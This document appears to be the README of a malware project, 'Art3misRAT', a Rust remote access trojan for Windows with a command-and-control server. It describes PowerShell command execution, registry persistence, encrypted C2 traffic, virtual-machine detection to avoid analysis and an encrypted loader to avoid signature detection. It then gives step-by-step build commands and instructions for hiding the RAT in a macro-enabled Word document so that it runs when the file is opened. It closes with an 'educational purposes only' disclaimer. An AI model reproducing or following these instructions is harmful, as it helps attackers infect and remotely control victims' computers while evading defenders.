Art3misRAT is a Remote Access Trojan (RAT) designed for Windows environments and written in Rust.
PowerShell Execution: Executes PowerShell commands with the ability to return the output to the server.
Persistence Mechanism: Ensures the RAT starts with Windows by adding a registry key.
AES-256 Encryption: Encrypts all communications between the RAT and the command-and-control (C2) server using AES-256 encryption.
Environment Awareness: Detects if running in a virtualized environment and exits if so, to prevent analysis.
Dynamic Code Loading: The RAT payload is stored in encrypted form and only decrypted at runtime, preventing static analysis and signature-based detection.
Art3misRAT consists of two main components:
Art3misRAT (Client)
The malware that runs on the infected machine. Establishes a connection to the C2 server. Sets up persistence by adding a registry key. Listens for incoming commands, decrypts them, and executes them. Returns the output of the commands to the C2 server.
Art3misServer (Server)
Listens on a specified port for incoming connections. Sends encrypted commands to the connected clients. Receives and decrypts the responses from the clients.
!!kill: Terminates the RAT process.
!!powershell or !!ps: Executes a PowerShell command.
!!powershell Get-Process
!!ps Get-Process
Fist off, youll need Rust if you dont have it already. You can download it here (
For the sake of this explanation, I will assume you exctract the Art3mis folder directly to C:\
Once that is complete, open a new terminal and follow along
Build the Server:
cd C:\Art3mis\Art3misServer\target
cargo build --release
You can run the server by going to C:\Art3mis\Art3misServer\target\release and running Art3misServer.exe
cd C:\Art3mis\Art3misServer\target\release
Note: by default the ip for the remote host ((where the RAT will connect back to)) is set to aka local host This will work great for testing it on your local machine, however if you want to deploy the RAT to a different system than where the server is running, you will need to go into the file and change the ip to the public facing ip of the server before building.
Build the RAT:
cd C:\Art3mis\Art3misRAT
cargo build --release
At this point the Art3misRAT.exe can be found in C:\Art3mis\Art3misRAT\target\release, and can be used as is, however there are additional steps if you want to use the Encrypted Loader Feature as well.
You can run the rat as is without the loader by going to C:\Art3mis\Art3misRAT\target\release and running Art3misRAT.exe. If you want to use the loader, or embed the payload in a delivery mechanism, you can skip this step.
Running Art3misRAT
cd C:\Art3mis\Art3misRAT\target\release
The loader is depandant on the file which contains the encrypted and chucked binary of Art3misRAT.exe. is produced by
cd C:\Art3mis
//check if python is installed, if not install it
//install the cryptography module if you haven't done so already
pip install cryptography
//run the encryptor
When the script is complete, will be saved to to the correct location and you can continue to build the loader.
Build the Loader
cd C:\Art3mis\Art3misLoader
cargo build --release
At this point the art3misloader can be found in C:\Art3mis\Art3misLoader\target\release, and can be used as is, however there are additional steps if you want to use the embed the payload in a delivery mechanism. If you want to embed the payload in a delivery mechanism, you can skip this step and continue to delivery.
Running the Loader
cd C:\Art3mis\Art3misLoader\target\release
The Art3misRAT executable was embedded into the Art3misRATDeliveryDemo.docm document using the RATEncoder script to demonstrate potential delivery methods. Check out my other repo RATEncoder to get the RATEncoder to reliably embed Art3misRAT and other executable payloads into Microsoft Word Documents.
RATEncoder (
First, youll need the RATEncoder script. For the sake of this tutorial, I will assume you downloaded it to C:\Art3mis.
You'll need to open the file with the text editor of your choice and modify the following lines
exe_path = r"C:\Users\path_to_file.exe"
output_path = r"C:\Users\path_to_file.txt"
Assuming you want to encode the Art3misRAT build WITHOUT the Encrypted Loader feature, use the following
exe_path = r"C:\Art3mis\Art3misRAT\target\release\Art3misRAT.exe"
output_path = r"C:\Art3mis\Art3misEncoded.txt"
OR if you want to encode the Art3misRAT build WITH the Encrypted Loader feature, use the following
exe_path = r"C:\Art3mis\Art3misLoader\target\release\art3misloader.exe"
output_path = r"C:\Art3mis\Art3misEncoded.txt"
Once you have done this, create a new Word Document, and save it as a .docm with macros enabled file. Then use alt F11 to open the macro editor, go to insert, new module, and copy and paste the entire contents of Art3misEncoded.txt into the module. Note: you will need to remove the fist "base64String =" from the file as it will cause a compile error with VBA. You can then save the macro and resave the file and Art3misRAT will then execute the next time the file is opened.
This software is provided for educational and research purposes only. The developers are not responsible for any misuse or damage caused by this software. Use it responsibly and legally.